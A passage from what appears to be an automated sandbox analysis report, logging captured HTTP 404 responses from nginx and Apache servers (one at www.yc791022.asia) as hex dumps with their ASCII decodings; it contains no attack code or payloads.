72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 02:55:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 02:55:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:56:05 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:56:08 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:56:11 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:56:14 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:56:20 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:56:23 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:56:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:56:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:56:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:56:52 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 02:56:55 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
